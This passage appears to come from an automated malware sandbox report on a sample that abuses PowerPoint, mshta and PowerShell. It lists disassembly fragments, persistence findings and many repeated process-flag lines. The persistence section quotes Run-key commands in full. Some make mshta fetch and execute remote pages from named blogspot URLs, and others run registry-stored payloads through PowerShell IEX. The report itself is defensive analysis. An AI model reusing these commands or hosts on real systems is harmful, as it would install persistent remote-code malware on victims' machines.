Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_05640450 push eax; mov dword ptr [esp], ecx	12_2_05640474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01E591D2 push eax; ret	24_2_01E591D5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_01E5921A pushad ; ret	24_2_01E5921D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_0571017C push 000000C3h; ret	24_2_057101A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_0571045C push eax; mov dword ptr [esp], ecx	24_2_05710474
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_05791A57 push 6E7FC374h; ret	24_2_05791A6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_05791B93 push 6E7FC3C4h; ret	24_2_05791BAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CEA1A8 push DCBDC399h; ret	33_2_01CEA219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF61FF push ebx; iretd	33_2_01CF6202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF61FD push ecx; iretd	33_2_01CF61FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF61F9 push eax; iretd	33_2_01CF61FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5DA4 push eax; retn 0074h	33_2_01CF5F59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5557 push ebp; iretd	33_2_01CF555A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5554 push ebp; iretd	33_2_01CF5556
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5578 push eax; retn 0074h	33_2_01CF5579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF6908 push eax; retn 0074h	33_2_01CF6BE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF2C9C push eax; retn 0074h	33_2_01CF2C9D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5098 push eax; retn 0074h	33_2_01CF5099
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF58B0 push eax; retn 0074h	33_2_01CF5D81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF6868 push edi; iretd	33_2_01CF689E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5077 push eax; iretd	33_2_01CF507A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5075 push eax; iretd	33_2_01CF5076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF43E8 push edi; iretd	33_2_01CF43D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF43E8 push edi; iretd	33_2_01CF4466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF43E0 push edi; iretd	33_2_01CF43E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF4388 push edi; iretd	33_2_01CF43DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF4F91 push eax; iretd	33_2_01CF4F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF4FB0 push eax; retn 0074h	33_2_01CF4FB1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 33_2_01CF5354 push eax; retn 0074h	33_2_01CF5355

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\mshta.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby

Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)\|IEX"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/stback1.html"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://startthepartyup.blogspot.com/p/backbone14.html"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html"", 0 : window.close")	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)\|IEX"", 0 : window.close")	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: unknown

Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\mshta.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
